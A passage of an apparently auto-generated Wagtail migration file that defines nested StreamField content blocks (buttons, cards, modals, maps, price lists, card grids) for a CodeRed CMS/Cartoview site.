('btn-lg', 'Large')], label='Button Size', required=False))])), ('image', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image'))])), ('image_text_overlay', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=200))])), ('image_link', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('alt_text', wagtail.core.blocks.CharBlock(help_text='Alternate text to show if the image doesn’t load', max_length=255, required=True))])), ('list', wagtail.core.blocks.StructBlock([('content', 
wagtail.core.blocks.ListBlock(wagtail.core.blocks.CharBlock(), label='Items'))])), ('html', wagtail.core.blocks.RawHTMLBlock(form_classname='monospace', icon='code', label='HTML')), ('accordions', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(label='Title', max_length=50)), ('content', wagtail.core.blocks.RichTextBlock(label='Content'))])), ('download', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False)), ('automatic_download', 
wagtail.core.blocks.BooleanBlock(label='Auto download', required=False)), ('downloadable_file', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False))])), ('embed_video', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('url', wagtail.embeds.blocks.EmbedBlock(help_text='Link to a YouTube/Vimeo video, tweet, facebook post, etc.', label='URL', required=True))])), ('quote', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('text', wagtail.core.blocks.TextBlock(label='Quote Text', required=True, rows=4)), ('author', wagtail.core.blocks.CharBlock(label='Author', max_length=255, required=False))])), ('table', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('table', wagtail.contrib.table_block.blocks.TableBlock())])), ('google_map', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], 
label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('search', wagtail.core.blocks.CharBlock(help_text='Address or search term used to find your location on the map.', label='Search query', max_length=255, required=False)), ('map_title', wagtail.core.blocks.CharBlock(help_text='Map title for screen readers, ex: "Map to Goodale Park"', label='Map title', max_length=255, required=False)), ('place_id', wagtail.core.blocks.CharBlock(help_text='Requires API key to use place ID.', label='Google place ID', max_length=255, required=False)), ('map_zoom_level', wagtail.core.blocks.IntegerBlock(default=14, help_text='Requires API key to use zoom. 1: World, 5: Landmass/continent, 10: City, 15: Streets, 20: Buildings', label='Map zoom level', required=False))])), ('page_list', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagelist_block.html', 'General, simple list'), ('coderedcms/blocks/pagelist_list_group.html', 'General, list group navigation panel'), ('coderedcms/blocks/pagelist_article_media.html', 'Article, media format'), ('coderedcms/blocks/pagelist_article_card_group.html', 'Article, card group - attached cards of equal size'), ('coderedcms/blocks/pagelist_article_card_deck.html', 'Article, card deck - separate cards of equal size'), ('coderedcms/blocks/pagelist_article_card_columns.html', 'Article, card masonry - fluid brick pattern')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('indexed_by', wagtail.core.blocks.PageChooserBlock(help_text='Show a 
preview of pages that are children of the selected page. Uses ordering specified in the page’s LAYOUT tab.', label='Parent page', required=True)), ('classified_by', coderedcms.blocks.base_blocks.ClassifierTermChooserBlock(help_text='Only show pages that are classified with this term.', label='Classified as', required=False)), ('show_preview', wagtail.core.blocks.BooleanBlock(default=False, label='Show body preview', required=False)), ('num_posts', wagtail.core.blocks.IntegerBlock(default=3, label='Number of pages to show'))])), ('page_preview', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagepreview_card.html', 'Card'), ('coderedcms/blocks/pagepreview_form.html', 'Form inputs')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('page', wagtail.core.blocks.PageChooserBlock(help_text='Show a mini preview of the selected page.', label='Page to preview', required=True))])), ('card', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/card_block.html', 'Card'), ('coderedcms/blocks/card_head.html', 'Card with header'), ('coderedcms/blocks/card_foot.html', 'Card with footer'), ('coderedcms/blocks/card_head_foot.html', 'Card with header and footer'), ('coderedcms/blocks/card_blurb.html', 'Blurb - rounded image and no border'), ('coderedcms/blocks/card_img.html', 'Cover image - use image as background')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', 
max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image', max_length=255, required=False)), ('title', wagtail.core.blocks.CharBlock(label='Title', max_length=255, required=False)), ('subtitle', wagtail.core.blocks.CharBlock(label='Subtitle', max_length=255, required=False)), ('description', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'ol', 'ul', 'hr', 'link', 'document-link'], label='Body')), ('links', wagtail.core.blocks.StreamBlock([('Links', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), 
('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))]))], blank=True, label='Links', required=False))])), ('carousel', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('carousel', wagtail.snippets.blocks.SnippetChooserBlock('coderedcms.Carousel'))])), ('modal', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), 
('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False)), ('header', wagtail.core.blocks.CharBlock(label='Modal heading', max_length=255, required=False)), ('content', wagtail.core.blocks.StreamBlock([('header', wagtail.core.blocks.StructBlock([('header', wagtail.core.blocks.ChoiceBlock(choices=[('h1', 'H1'), ('h2', 'H2'), ('h3', 'H3'), ('h4', 'H4'), ('h5', 'H5'), ('h6', 'H6')], label='Header Size')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=50))])), ('text', coderedcms.blocks.html_blocks.RichTextBlock(icon='fa-file-text-o')), ('button', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 
'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))])), ('image', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image'))])), ('image_text_overlay', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=200))])), ('image_link', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking 
Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('alt_text', wagtail.core.blocks.CharBlock(help_text='Alternate text to show if the image doesn’t load', max_length=255, required=True))])), ('list', wagtail.core.blocks.StructBlock([('content', wagtail.core.blocks.ListBlock(wagtail.core.blocks.CharBlock(), label='Items'))])), ('html', wagtail.core.blocks.RawHTMLBlock(form_classname='monospace', icon='code', label='HTML')), ('accordions', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(label='Title', max_length=50)), ('content', wagtail.core.blocks.RichTextBlock(label='Content'))])), ('download', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 
'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False)), ('automatic_download', wagtail.core.blocks.BooleanBlock(label='Auto download', required=False)), ('downloadable_file', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False))])), ('embed_video', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('url', wagtail.embeds.blocks.EmbedBlock(help_text='Link to a YouTube/Vimeo video, tweet, facebook post, etc.', label='URL', required=True))])), ('quote', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('text', wagtail.core.blocks.TextBlock(label='Quote Text', required=True, rows=4)), ('author', wagtail.core.blocks.CharBlock(label='Author', max_length=255, required=False))])), ('table', wagtail.core.blocks.StructBlock([('settings', 
wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('table', wagtail.contrib.table_block.blocks.TableBlock())])), ('google_map', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('search', wagtail.core.blocks.CharBlock(help_text='Address or search term used to find your location on the map.', label='Search query', max_length=255, required=False)), ('map_title', wagtail.core.blocks.CharBlock(help_text='Map title for screen readers, ex: "Map to Goodale Park"', label='Map title', max_length=255, required=False)), ('place_id', wagtail.core.blocks.CharBlock(help_text='Requires API key to use place ID.', label='Google place ID', max_length=255, required=False)), ('map_zoom_level', wagtail.core.blocks.IntegerBlock(default=14, help_text='Requires API key to use zoom. 
1: World, 5: Landmass/continent, 10: City, 15: Streets, 20: Buildings', label='Map zoom level', required=False))])), ('page_list', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagelist_block.html', 'General, simple list'), ('coderedcms/blocks/pagelist_list_group.html', 'General, list group navigation panel'), ('coderedcms/blocks/pagelist_article_media.html', 'Article, media format'), ('coderedcms/blocks/pagelist_article_card_group.html', 'Article, card group - attached cards of equal size'), ('coderedcms/blocks/pagelist_article_card_deck.html', 'Article, card deck - separate cards of equal size'), ('coderedcms/blocks/pagelist_article_card_columns.html', 'Article, card masonry - fluid brick pattern')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('indexed_by', wagtail.core.blocks.PageChooserBlock(help_text='Show a preview of pages that are children of the selected page. 
Uses ordering specified in the page’s LAYOUT tab.', label='Parent page', required=True)), ('classified_by', coderedcms.blocks.base_blocks.ClassifierTermChooserBlock(help_text='Only show pages that are classified with this term.', label='Classified as', required=False)), ('show_preview', wagtail.core.blocks.BooleanBlock(default=False, label='Show body preview', required=False)), ('num_posts', wagtail.core.blocks.IntegerBlock(default=3, label='Number of pages to show'))])), ('page_preview', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagepreview_card.html', 'Card'), ('coderedcms/blocks/pagepreview_form.html', 'Form inputs')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('page', wagtail.core.blocks.PageChooserBlock(help_text='Show a mini preview of the selected page.', label='Page to preview', required=True))]))], label='Content')), ('footer', wagtail.core.blocks.StreamBlock([('text', wagtail.core.blocks.CharBlock(icon='fa-file-text-o', label='Simple Text', max_length=255)), ('button', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), 
('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))]))], label='Modal footer', required=False))])), ('map', wagtail.core.blocks.StructBlock([('map', cartoview_cms.models.streamfields.Blocks.MapChooserBlock(required=True))])), ('map_catalog', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(label='Title', max_length=240)), ('featured_maps', wagtail.core.blocks.ListBlock(cartoview_cms.models.streamfields.Blocks.FeaturedMapChooser(), label='Featured Maps'))])), ('pricelist', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', 
wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('heading', wagtail.core.blocks.CharBlock(label='Heading', max_length=255, required=False)), ('items', wagtail.core.blocks.StreamBlock([('item', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image', required=False)), ('name', wagtail.core.blocks.CharBlock(label='Name', max_length=255, required=True)), ('description', wagtail.core.blocks.TextBlock(label='Description', required=False, rows=4)), ('price', wagtail.core.blocks.CharBlock(help_text='Any text here. Include currency sign if desired.', label='Price', required=True))]))], label='Items'))])), ('reusable_content', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('content', wagtail.snippets.blocks.SnippetChooserBlock('coderedcms.ReusableContent'))]))], label='Content'))]))], label='Content'))])), ('cardgrid', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/cardgrid_group.html', 'Card group - attached cards of equal size'), ('coderedcms/blocks/cardgrid_deck.html', 'Card deck - separate cards of equal size'), 
('coderedcms/blocks/cardgrid_columns.html', 'Card masonry - fluid brick pattern')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('fluid', wagtail.core.blocks.BooleanBlock(label='Full width', required=False)), ('content', wagtail.core.blocks.StreamBlock([('card', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/card_block.html', 'Card'), ('coderedcms/blocks/card_head.html', 'Card with header'), ('coderedcms/blocks/card_foot.html', 'Card with footer'), ('coderedcms/blocks/card_head_foot.html', 'Card with header and footer'), ('coderedcms/blocks/card_blurb.html', 'Blurb - rounded image and no border'), ('coderedcms/blocks/card_img.html', 'Cover image - use image as background')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image', max_length=255, required=False)), ('title', wagtail.core.blocks.CharBlock(label='Title', max_length=255, required=False)), ('subtitle', wagtail.core.blocks.CharBlock(label='Subtitle', max_length=255, required=False)), ('description', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'ol', 'ul', 'hr', 'link', 'document-link'], label='Body')), ('links', wagtail.core.blocks.StreamBlock([('Links', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom 
CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline 